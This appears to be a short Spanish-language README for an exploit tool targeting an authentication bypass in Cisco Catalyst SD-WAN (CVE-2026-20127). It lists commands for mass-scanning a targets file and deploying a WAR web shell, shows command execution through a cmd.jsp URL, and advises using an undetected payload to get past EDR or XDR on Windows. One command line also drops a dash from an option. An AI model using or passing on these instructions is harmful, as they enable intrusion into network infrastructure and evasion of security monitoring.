
exploit para la vulnerabilidad de bypass de autenticación de Cisco Catalyst SD-WAN (CVE-2026-20127)
Exploit EXP para la vulnerabilidad de omisión de autenticación en Cisco Catalyst SD-WAN (CVE-2026-20127)
python scan.py -f targets.txt
python scan.py -f targets.txt -v
python scan.py -f targets.txt -t 10 -o vulnerable.txt
python scan.py -f targets.txt -w cmd.war
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
Después de una reproducción exitosa de la vulnerabilidad, acceder a /cmd.gz/cmd.jsp?cmd=whoami mostrará el resultado en la página.
Si necesita cambiar a un webshell, prepare su propio paquete WAR (se recomienda usar un payload sin detección; según las pruebas, los sistemas Windows pueden tener EDR o XDR).